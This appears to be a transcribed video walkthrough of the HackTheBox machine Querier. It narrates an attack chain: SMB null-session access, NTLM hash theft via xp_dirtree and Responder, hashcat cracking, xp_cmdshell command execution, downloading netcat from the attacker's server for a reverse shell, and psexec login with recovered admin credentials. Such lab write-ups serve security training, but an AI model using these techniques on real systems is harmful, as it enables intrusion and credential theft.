Hello and welcome guys, and in this tutorial video we'll be looking at the HackTheBox machine called Querier. This box is very interesting because I like the realistic nature of it. It requires us using the packet tools a lot in order to get credentials, authenticate as a local user or low privilege user on the box. So we find MS SQL service running on the box, and then we attempt to authenticate to this MS SQL server remotely, and we find out that it's vulnerable to SQL injection, and then we attempt to steal the NTLM hash, and then go ahead to log in into the SQL database using its credentials, and then we attempt to enumerate the box to find the administrator's credentials as well in order to log in using in packets PSSEC and authenticate as the admin user. So let's have a look at how I did it. So I did an initial scan before beginning this recording, and there were a lot of ports open on this box, so we could see 1433 running Microsoft SQL Server version 14, I believe, and we can also see SMB service on 139 or 445. We can also see some HTTP services running on 5985 and 47011, and that pretty much sums it up. So the initial thing I did was, and you can see as well, we got the fully qualified domain name for this box, which is querier.atb.local. So anytime I see, port 1945 signifying an SMB share, we might be able to see there are some shares we could authenticate to, with SMB null session, and then see what we could get from those shares. So we could use the SMB client command. So SMB client, and I think -L it is, list the host 10.10.10.125. Asks for a password. I click on enter to see if we can enumerate for any shares. Taking a bit of a time, but it should come back with some result. There we go, and we can see straight away because the default Windows shares like admin, the C drive, IPC dollar, but the one that actually stands out here is the reports. So my initial thought was, this is strange, let's have a look. So using the SMB client command, I think we have to get rid of this. We could provide the name, so reports, and click on enter. Gives an error. Do we have to specify the -L? Let's try that. Same error as well. So /c dash password. And we should get authenticated because it's taking a bit of a time. And there we go. We have an SMB null session. So if we do question mark, we can see the commands. pwd tells us we're actually in this directory, and we could do a dir, and we see in this directory is a file called current volume report. So I decided to get this file. So because this file has got spaces between the file name, we have to put that in quotes and use the get command to get this file onto our box, download the file, exit the file. Then I go into my directory to look for this file. So HackTheBox, Querier, and we can see it's an Excel spreadsheet. Open up with LibreOffice, and it presents us with a blank spreadsheet. So my next thought was, right, maybe there's some macros installed. So I go to macros, edit macros, and begin to probe the macros to see if there's something unusual about the macros. So you can see we can find some macros actually embedded within this, and see if there could be some other juicy information. And clicking on this connect submenu, we could actually see a connection string suggesting this macro tries to connect to the SQL server. And we can see the server name is Querier. We can see it's not using a trusted connection. Database is volume, and we got some username and password that probably is using to authenticate. So I'm just going to copy this line and go in here and just call this notes. Paste this command there. Okay, so went back, close all of this down, and see if we can authenticate. So there's a tool we could use. I'm just going to cut notes and copy the username and password. Paste that here. And there is a tool, an in-packet tool we could use. So I'm just going to do locate MS SQL client. Okay, pardon me. MS SQL client.py. And we can see the in-packet tool. So if you haven't got MS SQL client or in-packet, you could just do a Google search for in-packet GitHub, clone the repository tools, and you'll be able to have this. But by default, I think Kali does have in-packet tools installed, but you might want to update that because it might not be updated by just git cloning your own. So I've got mine in root tools, in-packet examples, and so on. So we're going to attempt to use this. So I'm just going to do Python and run this, see what happens. And it tells us in order to use this, we specify the host name, the database using the DB flag, Windows authentication, and potential arguments. We could specify the domain name, the username, password at the target name or address. So this is the command we're going to attempt to use because we've got username and password credentials. So going back to this, we could do -Windows -auth, and we specify, like we found, a fully qualified domain name, queria.atb.local, and specify the username, which is reporting at 10.10.10.1.25, and specify the database name, volume. Click on enter, prompts us for a password, provide the password, copy that in, paste, tries to authenticate, and hopefully we should get a shell into the SQL database. There we go. So if we do this, we could see the help menu, some of the commands. So we could try to see if we could execute commands. So first of all, you have to enable the command shell. So paste that here. And it says you do not have permissions to run the reconfigure statement. So the next thing I did was to say, right, we've got a problem. What can we do? So I found after a bit of Googling, I found two useful, that's one here, and I found another cheat sheet, which is from Graceful Security. And there are a lot of commands we could use to perform SQL injection. So in order to know if it's vulnerable, we could run some commands as well here. So select version, for instance, to see what we're dealing with. And we can see we're dealing with a Windows Server 2019 standard 10. So that's probably suggesting a very up-to-date Windows box, and is running within a VM or an hypervisor in this instance. And the next thing I did was to say, right, maybe we'll be able to steal NTLM credentials by fooling the the server, so it tries to authenticate over SMB using the username and password, and then probably be able to steal that and authenticate as a user that actually has got permissions to run command injection code. So another set brought me to here where you could have a look at this, and after reading through this, I found out you could actually use a tool called Responder, and we have to set up Responder, and Responder will run an SMB service, and then we specify. So for instance, if this was a vulnerable web application that is vulnerable to SQL injection and is running MS SQL, we might be able to use this exec command directory tree, specify to the attacker's IP address, and have the responder running, and then the client or the victim would then send us the username and password. However, the password will be sort of NTLM credentials, which we could then attempt to crack using hashcat. So I said, right, okay, let's give this a go. So we can start up Responder to just say Responder. On Responder, we have to specify the interface. So the interface for my HackTheBox is running on ton 0. Specify that, and we can see it's listening for events. So I'm just going to put this in the top corner here, always on top. And then the next thing is to run this command. So a much more detailed way to run this command, if you go on to this other cheat sheet, is to use the declare. So we set up a character or a variable called Q, pointing to the attacker server, and then run that command. So I'm just going to copy these out. Go over here and just format this properly. So what we could do in this scenario is to get rid of this, probably up until there, just like we have over here, exec, master, whatever. And then specify our IP address. So let me find what my IP address is. If config ton 0, and that's my IP address, 10.10.13.16. Change that to the IP address I'm controlling here, paste. I have to use a double slash backslash in order for it to connect to the share, and just give a name called foo, and I think that should do it. We have to get rid of this because if you are actually doing this probably on a web application, you might have to have this colon, because that's what SQL commands use to end any argument. So I'm going to get rid of this. I'm going to copy this out, go to my SQL shell, paste this in, and click on enter, see what happens. And then we get a response saying skipping previously captured hash for Querier, and we get the username. However, I do not see the hash like I expected to have seen here. So apparently, Responder does have a log, so we could go to cd, I think is USR share slash responder, I believe. Yeah, and if we do a list, we can go to the logs, and if we do a list, we can actually find the file that contains the hash. So I could copy this and just cut this to see what we've got. And there we can see the hash that was captured for this user called MSSQL Querier, and then we can see the hash. So we have to copy all of this. I think copy here. I think it's done this twice. Copy this, and going to go back to our share. So cd HackTheBox, cd Querier, No, I'm gonna call these hashes or hash.txt. Paste that in. Save that. And going back to this, we could see we could run hashcat against this. So this, I believe, is the number that hashcat will use to identify this is an NTLM hash, and then we'll supply a word list. So let's start up hashcat. So we could do hashcat and help, and I could grep for NTLM. Okay, let's just type in help, see what happens. So we go to confirm 5005600. Yeah, there we go, net NTLM, and that's why it's using this. So we're going to specify this to see if it could use this to crack the password. So -m 5600 was the hashes. I put the file in list, hashes of text, so we could do hashcat -m 5600, specify the hash.txt, and then the word list is RockU, so that will be in user share, word list, and RockU.txt. Before I run this command, I'm just going to quickly go into cd root, cd/root, and cd.hashcat, and delete any previous record I might have. So I didn't spell that correctly. Hashcat list, and delete this port file, which probably holds some records inside. So I'm just going to remove this, paste this, get rid of that, and then run this command, see if hashcat is going to do this. So it says no device is found, so I probably have to force this to happen, and hashcat is going to go ahead to try to crack this hash. So probably this shouldn't take long, and then we might get some results. And there we go. We could see that was pretty quick, and this is the password, corporate 568. So I'm going to copy this. I'm going to say nano creds, and the username is mssql-svc, and the password, just going to paste that in here, save and exit. So now we could go in here, exit this, and try logging in with this different user. So we do mssql-svc, and then click on enter, bounce over a password, I think it was corporate 568, tries to authenticate. Hopefully it should drop us into a shell. We get a shell, we do this, and now we could enable the command, xp command, and you can see straight away we don't get that error. Now it's saying configuration change from 0 to 1, so we've enabled it. So it says run the reconfigure statement to install. So we go back to our grateful security cheat sheet, and we can find that command to start the reconfigure. Copy that, paste that in here, and now we can see the command has been enabled from 0 to 1. So now we can start running commands. So if we do this, copy that, paste in, and within here, maybe we should be able to run commands. So if I do dir, giving us an error. Let's go back in here and see how we can run a command. So we have to specify exec this, okay, and let's try this. Within the codes we put in ipconfig, and straight away we can see we have remote code execution. So you can see 10 10 10 125, which is the box. So it means we might even be able to cap the user flag by going into the directory. So if I do who am I, you can see now I'm Querier MSSQL VS, which is the user. So the next thing I did was to say, right, how do we get a reverse shell? So once again, I go into my tools directory, and I've got list nc. So list grep nc, and you can see I've got netcat. So the next thing I did was to say, right, if we could download netcat, since we can execute command, we could download netcat and then use that to get a reverse shell. So going back here, we could try to use PowerShell. So we can say PowerShell-C, and how do we run this command? You could say invoke -web request -URI. If you've probably seen my Giddy video, I use this command, which 9 out of 10 times works and doesn't give you an error. Specify my IP address, if config -0, IP address, paste that here. Before I do this command, let's just see where we've got the so if we say dir, just say, don't know if this is going to work. So let's just say pwd. Let's see what happens. Pwd is Windows Linux command, so I can say dir. We get this. Let's see if we could cat type, or let's try the directory cd /users /ms.sql mssql server, because normally this is where you have the flag, the user flag. So if I do this, let's see what happens. It says command failed. There's the type C users MySQL desktop user txt. When we get an error, C users, right, SVC. Yeah, I think that's it. And there we go. You can see now we've been able to cut out the user flag, so we can actually have access to this directory. I didn't want to do that, but anyway, that's done. So we could do the PowerShell command. So we could do PowerShell -c invoke -web, I think, request -URI. Then we specify our IP address, HTTP, keep forgetting what it is, if config -0. Okay, the IP address, copy that, paste that here. and netcat.exe, and then we end this there, and then we do dash out file, I think, and then the directory where we want this file to go. So we believe we should be able to write into our own directory. So I'm just going to do c/users mssql-svc, which is the username, slash desktop, and I'm just going to call this ncat.exe, and that with a double quote as well, and download the file. So we get an error, something not quite right. So PowerShell-C invoke web request -URI, specify the IP address. Okay, I think the error is from here, so let's exit this. I need to set up my tools directory where I've got netcat. I need to start up a python-m simple HTTP server port 80. So it's already in use. So have I got that running somewhere? Right, so we have to end responder. I think responder is well responsible for that error. So go back in here and do Python -m simple HTTP server port 80, I believe. Yeah. So just gonna put this on top, and then we go in here and execute this command again. Hopefully we should get the file downloaded. We get a connection, the file has been downloaded, no errors. And then we can go into this directory and execute a reverse shell. So we could do cmd.exe -c to execute a command, specify the IP address, which is, or specify the directory, which is this. Our IP address is 10.10. Let's confirm that one is again. So I could probably end this now since we've downloaded the file. Get rid of the always on top. It's kind of messy, but we're getting there. If config, specify my IP address to get a reverse shell, and I'm going to do 9002-E, and then we specify the command it needs to send back to us. So typical reverse shell, executing an netcat or netcat, connect to this IP address and give us a reverse shell. So all we have to do now is set up nc.nvlp 9002, put this here, and you should hopefully get shell. And there we go, we've got a shell. Great. So dir, you can see the directory, long one. We could do cls, does it clear screen? Doesn't. cd cd users. You know, we've already got the flag before, but we could just confirm that. So cd ms mssql svc dir, and we could go to desktop dir, and there we can actually see the file we downloaded. We can also see the user flag we got initially. So that is user. So the next thing I did was to do a system info. There is a new tool I wanted to try out. So system info, I believe. And system info will just give us information regarding the machine we are on. So we can see hostname is Querier, Windows Server 2019, which is probably very recent. You can also see the operating system version, so Windows 10. And we could see some information regarding it running on, so we can see the domain name. And we can also see a lot of patches have been installed, but not quite a lot. So what we could do is we could copy these information, copy this, and go on to CD hack the box. CD Querier. I'm just going to nano say system info.txt. Paste that here. Close that. There's a new tool which I found, or some guys shared on Twitter. I think it's called WesNG, I believe. WesNG GitHub. Yeah, so it is a Windows exploit suggester. So all you have to do is to, you could git clone this, or you could copy this wes.py file. So I'm just going to locate it because I think I've got it already. So wes.py. Can't find wes.py. Okay, so the tool requires us to get the system information. And once you get that, you can then run wesng against the system file information. So here it is. So system info, save that to systeminfo.txt, and then you can run wesng against this. So I'm just going to go grab this file. See, I don't think it has any dependencies. Copy this and go in here, do nano wes.py, paste that in. And we need to do wes.py. So take Python, just gonna do Python 3, wes.py --update in order for it to update the definition. So that's fine. And then we can run this against the system info to see if there are some privilege escalation exploits you can find. So straight away you can see that was real quick, and it does give us a lot of information. But what I found was, because this Querier machine is actually up to date, we can see a lot of vulnerabilities, but we do not see any exploit information. So we can see specific vulnerability, denial of service, and you could probably find remote code execution, but there's no exploit for it. So probably I'm expecting to see some sort of a link. And I think you could also see Windows storage service escalation of privilege vulnerability, but there is no exploit for any of these vulnerabilities. So if we were lucky, if we could find an exploit for privilege escalation, probably that would have worked. So the next thing was to enumerate. So there's a tool which I used, and it's called Power Up Windows Priv-Esc. And there is a version here. I think let's try this one. So by Shell Mafia, there's probably some other ones as well, I'm not quite sure. So it says this version is unsupported. Go here for the current version and go into the Priv-Esc So this is what we're looking for. So this still says 2015. Trying to see if there is how recent some of these are. This is 2016, so I better go for this one. So raw, and I'll copy this, Control A that, copy this, and so make directory PowerShell. So cd into PowerShell, and I'm just going to name this file nano powerup.ps1, and paste the contents in here. It's quite a big file, so it's going to take a while to paste. Scroll to the end of this file. So the end of this file says kernel 32. I don't think we've got that yet. So I'm going to wait a bit more for all the commands in the file to be pasted. I think I might have this file. So let's see if I've got it already rather than waiting for that one. So cd tools list power up to grep that. So grep power up. I haven't got it. See power. Yeah, so I've got the file here called power, and that's the same file I'm trying to copy here, which is taking a lot of time. So you're able to just download that file, copy it, or clone the script, whichever way you're able to get it onto your box. So I'm just going to go for the one I've got already to save time. So once again, I'm going to start up a Python -m simple HTTP server on port 80, and then go onto our box and try to download this using PowerShell. So, and this will just enumerate the box to see if there are any credentials or vulnerabilities that we might find. So I'm just going to do PowerShell since we're already on the box. PowerShell-C and invoke request, invoke web dash, just like we did before, web request and dash URI, provide the IP address. So HTTP 10.10.10, check my IP address again. If config, IP address is 13.16. Let's just check if this file has copied successfully. Don't think so. Think it's probably taking a lot of time. I'm just going to close that, and 16/powerup.ps1, and that in quotes, and I think that should do it. I need to specify the out file. So ps1 I think we have to specify the out file, isn't it? So out file. So we do c dash users dash ms sql dash svc specify the desktop, and I'm just going to call it the same name as well. So powerup.ps1. So end that in quotes. This, I think I've got it here, I'm not sure. Nope. So out file, specify this, see, I think I just copy it from here, which makes a lot of sense. Copy that there, and slash powerup.ps1, then we end the code. Says an error. We got 44, so the name probably is wrong. So it's powerup.ps1. Yeah, we're right. Powerup.ps1. It says, did I type something? Is there a typo error somewhere? Let's copy this. It's been quite a long video, so hopefully I'm making a bit of mistakes, but that's fine. Just gonna get this command right. So PowerShell C invoke request .uri http. Right, I think this is where the error is. So there should be another code that ends here. And we copy this now and run it. Paste that in here. And hopefully it should download the file. No, it's giving us an error. Still giving us a 404 not found. We do have the file here called powerup.ps1. Let's have a look at the command. So PowerShell invoke web request URI http 10.10.10 powerup. All right, there's a typo, so it's a lowercase p. That's why we're getting an error. Paste that here. No errors, so great. And then we can see 200. So the file has been successfully downloaded. Now, if we do a dir, we can see our PowerUp script, and we need to invoke the script before we can execute it. So we first of all have to import module. So import module -name and the file name. So specify the directory it is in. It's in here. Paste, and we do the file name. So powerup.ps1. Import module. So saying, right, okay, so we could first of all do PowerShell. So after we do PowerShell, it drops us to PowerShell, and then we can then invoke the script. So in order to call the invoke module, you have to be in the PowerShell shell. Okay, no errors. And then the next thing we need to do now is to, if we go into the help menu for the script, see this, readme. I think we have to call a command called invoke -all checks, and it's going to enumerate it. So I think this command, I think I was looking for the right command to use. I don't know why I can't really find the version that I downloaded earlier on for when I attempted this the first time. So I think there are some guidance notes. I think this one is probably, yeah, that's it here. So after you download it, you just run invoke all checks. And I think there's a much more documented cheat sheet somewhere that actually tells you exactly what all of those commands actually do. So now the command has finished running, and we can see straight away, we can see he's enumerated a lot of things. So check in registry keys, and eventually it's checking for passwords. So Windows privilege escalation talks about files or passwords can be hidden in some of these XML files. So unattended is one. It checks another one, nothing, but eventually it goes to the group policy XML file and is able to get the credentials, so we can see administrator and the password. So I'm just going to copy the username and password here, paste it to our notes. So my uncle are Mario and Luigi, exclamation, exclamation mark, one, exclamation mark, administrator. So we could try to authenticate now. I'm just going to exit the shell. Go back here, exit this. So we go back to, just clear most of this shells. This one is the one we got the shell from, so we could get 9002 running. And then we could use, so locate PSExec, I think, PSExec.py, and we get the in-packet tool PSExec we could use to authenticate as the, so let's have a look at the help on how to use this. So host part name, and it says target domain username password, and then the username password at the target IP address or target name. So in order to do this, we could just do splash screen to make sure this is nice and tidy. Python PSExec, and I'm just going to run the command. So the first thing was the domain name, which is querier.local.htb and slash the username administrator at 10.10.10.125. I think that should do. Prompts for the password. Copy the password. Paste that here. Click on enter. And it should authenticate as the admin user, drop us into a shell if everything works fine. Here we go, uploading the payload. And any moment from now, we should get a shell starting the service. Come on. And there we go. We've got a shell. Just do who am I? I'm NT authority system. And we could go a few directories, cd users, cd administrator, dir, cd desktop, cd desktop, I believe, dir, and there we go, that's the root flag. So that worked. So that is the box if you want to get a shell. I think another thing is we could authenticate over SMB using the same credentials if you don't want to get a shell, and also be able to access the root flag from there. So I'm just going to try that before I sign out. So exit the shell. I just open up an SMB connection. So we can do SMB, client, and we specify 10. So I'm going to do it here because it's a much more bigger font. So SMB clients, then we specify the share, which is 10.125. This time around, we're going to specify the C drive, user administrator, browser for a password, copy in the password, paste that here, and we should get an SMB shell into the C drive. There we go. So if we do a dir, we can see the directory, users, cd administrator, dir, cd desktop, dir, and we got the root flag as well sitting there. So we could just get the root flag and cut that on our box. So that is the box. Thank you for watching, and I shall see you some other time. Take care.